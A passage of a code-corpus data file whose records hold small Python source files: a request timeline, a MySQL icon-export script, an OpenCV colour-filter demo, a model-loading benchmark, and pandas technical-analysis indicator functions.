"os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 193, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 193, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 227, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 228, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONE", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 235, "usage_type": "attribute"}, {"api_name": 
"os.remove", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path", "line_number": 262, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 277, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 294, "usage_type": "name"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 295, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 297, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 297, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 301, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 301, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 301, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 301, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 303, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 306, "usage_type": "call"}, {"api_name": "os.path", "line_number": 306, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 307, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 322, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 322, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 341, "usage_type": "call"}, {"api_name": "os.path", "line_number": 341, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path", "line_number": 344, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 344, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 345, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path", "line_number": 345, "usage_type": "attribute"}, {"api_name": "argparse.Action", "line_number": 349, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path", "line_number": 357, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 359, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 365, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 419, "usage_type": "attribute"}]}
+{"seq_id": "26972475259", "text": "from sortedcontainers import SortedSet\nfrom request import Request\nfrom response import Response\n\n\nclass Timeline:\n def __init__(self, requests_file_name):\n self.timeline = SortedSet(key=lambda x: x.finish_time if type(x) is Response else x.created_time)\n with open(requests_file_name) as requests_input_file:\n for line in requests_input_file:\n tokens = line.split()\n time, app_name = int(tokens[0]), tokens[1]\n self.add(Request(app_name, time))\n\n def get_next(self):\n return self.timeline.pop(0) if len(self.timeline) else None\n\n def add(self, obj):\n self.timeline.add(obj)\n\n def iterate(self):\n while True:\n next_elem = self.get_next()\n if next_elem:\n yield next_elem\n else:\n break\n", "repo_name": "maxxaon/kursovaya", "sub_path": "scaler_Marin/timeline.py", "file_name": "timeline.py", "file_ext": "py", "file_size_in_byte": 850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sortedcontainers.SortedSet", "line_number": 8, "usage_type": "call"}, {"api_name": "response.Response", "line_number": 8, "usage_type": "name"}, {"api_name": "request.Request", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "19189003342", "text": "from dc import *\nfrom sqlalchemy.pool import QueuePool\nimport mysql.connector\nimport os\n\nmysql_connection_env = {\n \"host\": getenv(\"MYSQL_HOST\", \"127.0.0.1\"),\n \"port\": getenv(\"MYSQL_PORT\", 3306),\n \"user\": getenv(\"MYSQL_USER\", \"isucon\"),\n \"password\": getenv(\"MYSQL_PASS\", \"isucon\"),\n \"database\": getenv(\"MYSQL_DBNAME\", \"isucondition\"),\n \"time_zone\": \"+09:00\",\n}\ndef select_all(cnxpool, query, *args, dictionary=True):\n cnx = cnxpool.connect()\n try:\n cur = cnx.cursor(dictionary=dictionary)\n cur.execute(query, *args)\n return cur.fetchall()\n finally:\n cnx.close()\n\n\n# コネクションプール サイズ10\ncnxpool = QueuePool(lambda: mysql.connector.connect(**mysql_connection_env), pool_size=10)\n\nquery = \"\"\"\n SELECT * FROM `isu` ORDER BY `id` DESC\n\"\"\"\nisu_list = [Isu(**row) for row in select_all(cnxpool, query, ())]\n\nfor isu in isu_list:\n image = isu.image\n filepath = APP_ROUTE + f\"api/isu/{isu.jia_isu_uuid}/icon\"\n os.makedirs(os.path.dirname(filepath), exist_ok=True)\n with open(filepath, \"wb\") as f:\n f.write(image)\n", "repo_name": "lapras-inc/ISUCON-11-manin", "sub_path": "python/_export_icon.py", "file_name": "_export_icon.py", "file_ext": "py", "file_size_in_byte": 1100, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.pool.QueuePool", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 25, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 25, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}]}
+{"seq_id": "74285446247", "text": "import cv2 \nimport numpy as np \n\nminRed1 = np.array([90, 100, 100]) \nmaxRed1 = np.array([135, 255, 255]) \n\nminRed2 = np.array([0, 100, 250])\nmaxRed2 = np.array([0, 255, 255])\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n ret, frame = cap.read() \n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) \n\n red_only1 = cv2.bitwise_and(frame, frame, mask=cv2.inRange(hsv, minRed1, maxRed1)) \n red_only2 = cv2.bitwise_and(frame, frame, mask=cv2.inRange(hsv, minRed2, maxRed2)) \n\n result = cv2.addWeighted(red_only1, 1, red_only2, 1, 1)\n cv2.imshow('window', frame) \n cv2.imshow('window2', result) \n\n if cv2.waitKey(1) & 0xFF == ord('q'): \n break \n\ncap.release() \ncv2.destroyAllWindows()\n\n", "repo_name": "Null-Delta/ADMP", "sub_path": "LR2/task2.py", "file_name": "task2.py", "file_ext": "py", "file_size_in_byte": 701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_and", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "21583851226", "text": "import torch\nfrom transformers import AutoTokenizer, AutoModelForTokenClassification, pipeline, AutoModelForCausalLM\nfrom transformers import pipeline\nfrom deepspeed.module_inject import HFBertLayerPolicy\nimport deepspeed\nimport tqdm\nfrom datasets import load_dataset\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\ndataset = load_dataset(\"ChaiML/user_model_inputs\")\n# Model Repository on huggingface.co\nmodel_id = \"KoboldAI/OPT-6B-nerys-v2\"\n# model_id = \"gpt2\"\n\nstats = {}\n\n# load model and tokenizer\ntry:\n tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=True)\nexcept:\n tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=False)\n\n# Test pipeline\nGENERATION_KWARGS = {\n \"max_new_tokens\": 32,\n # \"min_new_tokens\": 8,\n 'eos_token_id': 198,\n 'do_sample': True,\n 'pad_token_id': 198,\n 'temperature': 0.72,\n 'top_k': 0,\n 'top_p': 0.725,\n 'repetition_penalty': 1.13,\n}\n\nINPUT_EXAMPLES = dataset[\"train\"][\"text\"][:100]\n\nexample = INPUT_EXAMPLES[0]\n\nimport os\nfrom optimum.onnxruntime import ORTModelForCausalLM\nfrom transformers import AutoTokenizer, pipeline\n\nmodel_checkpoint = \"KoboldAI/OPT-6B-nerys-v2\"\nsave_directory = \"onnx/\"\nfile_name = \"model.onnx\"\nonnx_path = os.path.join(save_directory, \"model.onnx\")\n\n# Load a model from transformers and export it through the ONNX format\n# model = ORTModelForCausalLM.from_pretrained(model_checkpoint, from_transformers=True).to(0)\n\nmax_batch_size = 1\nfor i in range(1, 5):\n try:\n inputs = tokenizer([example] * i, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\n print(f\"Batch size: {i}\")\n max_batch_size = i\n except Exception as ex:\n print(ex)\n break\n\n# torch_pipe = pipeline(\"text-generation\", model=model, tokenizer=tokenizer, device=0)\nprint(\"ONNX single batch\")\ntorch_outputs = []\nfor example in tqdm.tqdm(INPUT_EXAMPLES[:20], desc=\"ONNX single batch\"):\n inputs = tokenizer(example, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\n # torch_output = torch_pipe(example, **GENERATION_KWARGS)[0][\"generated_text\"][len(example):]\n # torch_outputs.append(torch_output)\nprint(\"ONNX batch size\")\ntorch_outputs = []\ntry:\n for example in tqdm.tqdm(INPUT_EXAMPLES[:10], desc=\"ONNX batch size\"):\n inputs = tokenizer([example] * max_batch_size, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\nexcept Exception as ex:\n print(ex)\n", "repo_name": "AlekseyKorshuk/xla-clm", "sub_path": "onnx/bert.py", "file_name": "bert.py", "file_ext": "py", "file_size_in_byte": 2510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 10, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 11, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 20, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 20, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 22, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 67, "usage_type": "call"}, 
{"api_name": "tqdm.tqdm", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "24315675344", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# https://www.quantopian.com/posts/technical-analysis-indicators-without-talib-code\n# https://github.com/FreddieWitherden/ta/blob/master/ta.py\n\nimport pandas as pd\nimport numpy as np\n\n#Moving Average\ndef MA(df, n):\n MA = pd.Series(pd.rolling_mean(df['close'], n), name = 'MA_' + str(n))\n return MA\n\n#Exponential Moving Average\ndef EMA(df, n):\n EMA = pd.Series(df['close'].ewm(span = n, min_periods = int(n - 1)).mean(), name = 'EMA_' + str(n))\n return EMA\n\n#Momentum\ndef MOM(df, n):\n M = pd.Series(df['close'].diff(n), name = 'Momentum_' + str(n))\n return M\n\n#Rate of Change\ndef ROC(df, n):\n M = df['close'].diff(n - 1)\n N = df['close'].shift(n - 1)\n ROC = pd.Series(M / N, name = 'ROC_' + str(n))\n return ROC\n\n#Average True Range\ndef ATR(df, n):\n i = 0\n TR_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n i = i + 1\n TR_s = pd.Series(TR_l)\n ATR = pd.Series(TR_s.ewm(span = n, min_periods = int(n)).mean(), name = 'ATR_' + str(n))\n return ATR\n\n#Bollinger Bands\ndef BBANDS(df, n):\n MA = pd.Series(pd.rolling_mean(df['close'], n))\n MSD = pd.Series(pd.rolling_std(df['close'], n))\n b1 = 4 * MSD / MA\n B1 = pd.Series(b1, name = 'BollingerB_' + str(n))\n b2 = (df['close'] - MA + 2 * MSD) / (4 * MSD)\n B2 = pd.Series(b2, name = 'Bollinger%b_' + str(n))\n return B1, B2\n\n#Pivot Points, Supports and Resistances\ndef PPSR(df):\n PP = pd.Series((df['high'] + df['low'] + df['close']) / 3)\n R1 = pd.Series(2 * PP - df['low'])\n S1 = pd.Series(2 * PP - df['high'])\n R2 = pd.Series(PP + df['high'] - df['low'])\n S2 = pd.Series(PP - df['high'] + df['low'])\n R3 = pd.Series(df['high'] + 2 * (PP - df['low']))\n S3 = pd.Series(df['low'] - 2 * (df['high'] - PP))\n psr = {'PP':PP, 'R1':R1, 'S1':S1, 'R2':R2, 'S2':S2, 'R3':R3, 'S3':S3}\n PSR = pd.DataFrame(psr)\n return PSR\n\n#Stochastic oscillator %K\ndef STOK(df):\n SOk = pd.Series((df['close'] - df['low']) / (df['high'] - df['low']), name = 'SO%k')\n return SOk\n\n#Stochastic oscillator %D\ndef STO(df, n):\n SOk = pd.Series((df['close'] - df['low']) / (df['high'] - df['low']), name = 'SO%k')\n SOd = pd.Series(SOk.ewm(span = n, min_periods = int(n - 1)).mean(), name = 'SO%d_' + str(n))\n return SOd\n\n#Trix\ndef TRIX(df, n):\n EX1 = df['close'].ewm(span = n, min_periods = int(n - 1)).mean()\n EX2 = EX1.ewm(span = n, min_periods = int(n - 1)).mean()\n EX3 = EX2.ewm(span = n, min_periods = int(n - 1)).mean()\n i = 0\n ROC_l = [0]\n while i + 1 <= df.index[-1]:\n ROC = (EX3[i + 1] - EX3[i]) / EX3[i]\n ROC_l.append(ROC)\n i = i + 1\n Trix = pd.Series(ROC_l, name = 'Trix_' + str(n))\n return Trix\n\n#Average Directional Movement Index\ndef ADX(df, n, n_ADX):\n i = 0\n UpI = []\n DoI = []\n while i + 1 <= df.index[-1]:\n UpMove = df.ix[i + 1, 'high'] - df.ix[i, 'high']\n DoMove = df.ix[i, 'low'] - df.ix[i + 1, 'low']\n if UpMove > DoMove and UpMove > 0:\n UpD = UpMove\n else: UpD = 0\n UpI.append(UpD)\n if DoMove > UpMove and DoMove > 0:\n DoD = DoMove\n else: DoD = 0\n DoI.append(DoD)\n i = i + 1\n i = 0\n TR_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n i = i + 1\n TR_s = pd.Series(TR_l)\n ATR = pd.Series(TR_s.ewm(span = n, min_periods = int(n)).mean())\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span = n, min_periods = 
int(n - 1)).mean() / ATR)\n    NegDI = pd.Series(DoI.ewm(span = n, min_periods = int(n - 1)).mean() / ATR)\n    ADX = pd.Series((abs(PosDI - NegDI) / (PosDI + NegDI)).ewm(span = n_ADX, min_periods = int(n_ADX - 1)).mean(), name = 'ADX_' + str(n) + '_' + str(n_ADX))\n    return ADX\n\n#DEMA\ndef DEMA(df, n_fast, n_slow, signal=9):\n    EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n    EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n    DEMA = pd.Series(100 * (EMAfast - EMAslow) / ((EMAfast + EMAslow) / 2), name = 'DEMA_' + str(n_fast) + '_' + str(n_slow))\n    return DEMA\n\n#MACD, MACD Signal and MACD difference\ndef MACD(df, n_fast, n_slow, signal=9):\n    EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n    EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n    MACD = pd.Series(EMAfast - EMAslow, name = 'MACD_' + str(n_fast) + '_' + str(n_slow))\n    MACDsign = pd.Series(MACD.ewm(span = signal, min_periods = int(signal)).mean(), name = 'MACDsign_' + str(n_fast) + '_' + str(n_slow))\n    MACDdiff = pd.Series(MACD - MACDsign, name = 'MACDdiff_' + str(n_fast) + '_' + str(n_slow))\n    return MACD, MACDsign, MACDdiff\n\n#PPO, PPO Signal and PPO difference\ndef PPO(df, n_fast, n_slow, signal=9):\n    EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n    EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n    PPO = pd.Series(100 * (EMAfast - EMAslow) / EMAslow, name = 'PPO_' + str(n_fast) + '_' + str(n_slow))\n    PPOsign = pd.Series(PPO.ewm(span = signal, min_periods = int(signal)).mean(), name = 'PPOsign_' + str(n_fast) + '_' + str(n_slow))\n    PPOdiff = pd.Series(PPO - PPOsign, name = 'PPOdiff_' + str(n_fast) + '_' + str(n_slow))\n    return PPO, PPOsign, PPOdiff\n\n#Mass Index\ndef MassI(df):\n    Range = df['high'] - df['low']\n    EX1 = Range.ewm(span = 9, min_periods = 8).mean()\n    EX2 = EX1.ewm(span = 9, min_periods = 8).mean()\n    Mass = EX1 / EX2\n    MassI = pd.Series(pd.rolling_sum(Mass, 25), name = 'Mass Index')\n    return MassI\n\n#Vortex Indicator: http://www.vortexindicator.com/VFX_VORTEX.PDF\ndef Vortex(df, n):\n    i = 0\n    TR = [0]\n    while i < df.index[-1]:\n        Range = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n        TR.append(Range)\n        i = i + 1\n    i = 0\n    VM = [0]\n    while i < df.index[-1]:\n        Range = abs(df.ix[i + 1, 'high'] - df.ix[i, 'low']) - abs(df.ix[i + 1, 'low'] - df.ix[i, 'high'])\n        VM.append(Range)\n        i = i + 1\n    VI = pd.Series(pd.rolling_sum(pd.Series(VM), n) / pd.rolling_sum(pd.Series(TR), n), name = 'Vortex_' + str(n))\n    return VI\n\n\n\n\n\n#KST Oscillator\ndef KST(df, r1, r2, r3, r4, n1, n2, n3, n4):\n    M = df['close'].diff(r1 - 1)\n    N = df['close'].shift(r1 - 1)\n    ROC1 = M / N\n    M = df['close'].diff(r2 - 1)\n    N = df['close'].shift(r2 - 1)\n    ROC2 = M / N\n    M = df['close'].diff(r3 - 1)\n    N = df['close'].shift(r3 - 1)\n    ROC3 = M / N\n    M = df['close'].diff(r4 - 1)\n    N = df['close'].shift(r4 - 1)\n    ROC4 = M / N\n    KST = pd.Series(pd.rolling_sum(ROC1, n1) + pd.rolling_sum(ROC2, n2) * 2 + pd.rolling_sum(ROC3, n3) * 3 + pd.rolling_sum(ROC4, n4) * 4, name = 'KST_' + str(r1) + '_' + str(r2) + '_' + str(r3) + '_' + str(r4) + '_' + str(n1) + '_' + str(n2) + '_' + str(n3) + '_' + str(n4))\n    return KST\n\n#Relative Strength Index\ndef RSI(df, n):\n    UpMove = df['high'].diff(-1)\n    DoMove = df['low'].diff(1)\n    UpMove[UpMove <= DoMove] = 0\n    DoMove[DoMove <= UpMove] = 
0\n UpMove[UpMove < 0] = 0\n DoMove[DoMove < 0] = 0\n UpMove = pd.Series(UpMove)\n DoMove = pd.Series(DoMove)\n PosDI = pd.Series(UpMove.ewm(span = n, min_periods = int(n - 1)).mean())\n NegDI = pd.Series(DoMove.ewm(span = n, min_periods = int(n - 1)).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name = 'RSI_' + str(n))\n return RSI\n\n#Relative Strength Index\ndef RSI_(df, n):\n i = 0\n UpI = [0]\n DoI = [0]\n while i + 1 < df.shape[0]:\n UpMove = df.ix[i + 1, 'high'] - df.ix[i, 'high']\n DoMove = df.ix[i, 'low'] - df.ix[i + 1, 'low']\n if UpMove > DoMove and UpMove > 0:\n UpD = UpMove\n else: UpD = 0\n UpI.append(UpD)\n if DoMove > UpMove and DoMove > 0:\n DoD = DoMove\n else: DoD = 0\n DoI.append(DoD)\n i = i + 1\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span = n, min_periods = int(n - 1)).mean())\n NegDI = pd.Series(DoI.ewm(span = n, min_periods = int(n - 1)).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name = 'RSI_' + str(n))\n return RSI\n\n#Relative Strength Index\ndef _RSI(df, n):\n nint = int(n)\n deltas = df[\"close\"].diff()\n seed = deltas[:nint+1]\n up = seed[seed>=0].sum()/n\n down = -seed[seed<0].sum()/n\n rs = up/down\n rsi = np.zeros((df.shape[0],), dtype=np.float64)\n rsi[:nint] = 100. - 100./(1.+rs)\n\n for i in range(nint, len(deltas)):\n delta = deltas[i-1] # cause the diff is 1 shorter\n\n if delta>0:\n upval = delta\n downval = 0.\n else:\n upval = 0.\n downval = -delta\n\n up = (up*(n-1) + upval)/n\n down = (down*(n-1) + downval)/n\n\n rs = up/down\n rsi[i] = 100. - 100./(1.+rs)\n RSI = pd.Series(rsi, name = 'RSI_' + str(n))\n return RSI\n\n# Stochastic Relative Strength Index\ndef STOCHRSI(df, n):\n start = -int(n)\n if start < 0:\n start = 0\n rsi = RSI(df, n)\n RSIhistory = rsi[start:]\n minRSI = RSIhistory.min()\n maxRSI = RSIhistory.max()\n base = maxRSI - minRSI\n if base == 0:\n base = -minRSI\n STOCHRSI = pd.Series(((rsi - minRSI) / base), name = 'STOCHRSI_' + str(n))\n return STOCHRSI\n\n#True Strength Index\ndef TSI(df, r, s):\n M = pd.Series(df['close'].diff(1))\n aM = abs(M)\n EMA1 = pd.Series(M.ewm(span = r, min_periods = int(r - 1)).mean())\n aEMA1 = pd.Series(aM.ewm(span = r, min_periods = int(r - 1)).mean())\n EMA2 = pd.Series(EMA1.ewm(span = s, min_periods = int(s - 1)).mean())\n aEMA2 = pd.Series(aEMA1.ewm(span = s, min_periods = int(s - 1)).mean())\n TSI = pd.Series(EMA2 / aEMA2, name = 'TSI_' + str(r) + '_' + str(s))\n return TSI\n\n#Accumulation/Distribution\ndef ACCDIST(df, n):\n ad = (2 * df['close'] - df['high'] - df['low']) / (df['high'] - df['low']) * df['volume']\n M = ad.diff(n - 1)\n N = ad.shift(n - 1)\n ROC = M / N\n AD = pd.Series(ROC, name = 'Acc/Dist_ROC_' + str(n))\n return AD\n\n#Chaikin Oscillator\ndef Chaikin(df):\n ad = (2 * df['close'] - df['high'] - df['low']) / (df['high'] - df['low']) * df['volume']\n Chaikin = pd.Series(ad.ewm(span = 3, min_periods = 2).mean() - ad.ewm(span = 10, min_periods = 9).mean(), name = 'Chaikin')\n return Chaikin\n\n#Money Flow Index and Ratio\ndef MFI(df, n):\n PP = (df['high'] + df['low'] + df['close']) / 3\n i = 0\n PosMF = [0]\n while i < df.index[-1]:\n if PP[i + 1] > PP[i]:\n PosMF.append(PP[i + 1] * df.ix[i + 1, 'volume'])\n else:\n PosMF.append(0)\n i = i + 1\n PosMF = pd.Series(PosMF)\n TotMF = PP * df['volume']\n MFR = pd.Series(PosMF / TotMF)\n MFI = pd.Series(pd.rolling_mean(MFR, n), name = 'MFI_' + str(n))\n return MFI\n\n#On-balance Volume\ndef OBV(df, n):\n i = 0\n OBV = [0]\n while i < df.index[-1]:\n if df.ix[i + 1, 'close'] - df.ix[i, 
'close'] > 0:\n OBV.append(df.ix[i + 1, 'volume'])\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] == 0:\n OBV.append(0)\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] < 0:\n OBV.append(-df.ix[i + 1, 'volume'])\n i = i + 1\n OBV = pd.Series(OBV)\n OBV_ma = pd.Series(pd.rolling_mean(OBV, n), name = 'OBV_' + str(n))\n return OBV_ma\n\n#Force Index\ndef FORCE(df, n):\n F = pd.Series(df['close'].diff(n) * df['volume'].diff(n), name = 'Force_' + str(n))\n return F\n\n#Ease of Movement\ndef EOM(df, n):\n EoM = (df['high'].diff(1) + df['low'].diff(1)) * (df['high'] - df['low']) / (2 * df['volume'])\n Eom_ma = pd.Series(pd.rolling_mean(EoM, n), name = 'EoM_' + str(n))\n return Eom_ma\n\n#Commodity Channel Index\ndef CCI(df, n):\n PP = (df['high'] + df['low'] + df['close']) / 3\n CCI = pd.Series((PP - pd.rolling_mean(PP, n)) / pd.rolling_std(PP, n), name = 'CCI_' + str(n))\n return CCI\n\n#Coppock Curve\ndef COPP(df, n):\n M = df['close'].diff(int(n * 11 / 10) - 1)\n N = df['close'].shift(int(n * 11 / 10) - 1)\n ROC1 = M / N\n M = df['close'].diff(int(n * 14 / 10) - 1)\n N = df['close'].shift(int(n * 14 / 10) - 1)\n ROC2 = M / N\n Copp = pd.Series((ROC1 + ROC2).ewm(span = n, min_periods = int(n)).mean(), name = 'Copp_' + str(n))\n return Copp\n\n#Keltner Channel\ndef KELCH(df, n):\n KelChM = pd.Series(pd.rolling_mean((df['high'] + df['low'] + df['close']) / 3, n), name = 'KelChM_' + str(n))\n KelChU = pd.Series(pd.rolling_mean((4 * df['high'] - 2 * df['low'] + df['close']) / 3, n), name = 'KelChU_' + str(n))\n KelChD = pd.Series(pd.rolling_mean((-2 * df['high'] + 4 * df['low'] + df['close']) / 3, n), name = 'KelChD_' + str(n))\n return KelChM, KelChU, KelChD\n\n#Ultimate Oscillator\ndef ULTOSC(df):\n i = 0\n TR_l = [0]\n BP_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n BP = df.ix[i + 1, 'close'] - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n BP_l.append(BP)\n i = i + 1\n UltO = pd.Series((4 * pd.rolling_sum(pd.Series(BP_l), 7) / pd.rolling_sum(pd.Series(TR_l), 7)) + (2 * pd.rolling_sum(pd.Series(BP_l), 14) / pd.rolling_sum(pd.Series(TR_l), 14)) + (pd.rolling_sum(pd.Series(BP_l), 28) / pd.rolling_sum(pd.Series(TR_l), 28)), name = 'Ultimate_Osc')\n return UltO\n\n#Donchian Channel\ndef DONCH(df, n):\n i = 0\n DC_l = []\n while i < n - 1:\n DC_l.append(0)\n i = i + 1\n i = 0\n while i + n - 1 < df.index[-1]:\n DC = max(df['high'].ix[i:i + n - 1]) - min(df['low'].ix[i:i + n - 1])\n DC_l.append(DC)\n i = i + 1\n DonCh = pd.Series(DC_l, name = 'Donchian_' + str(n))\n 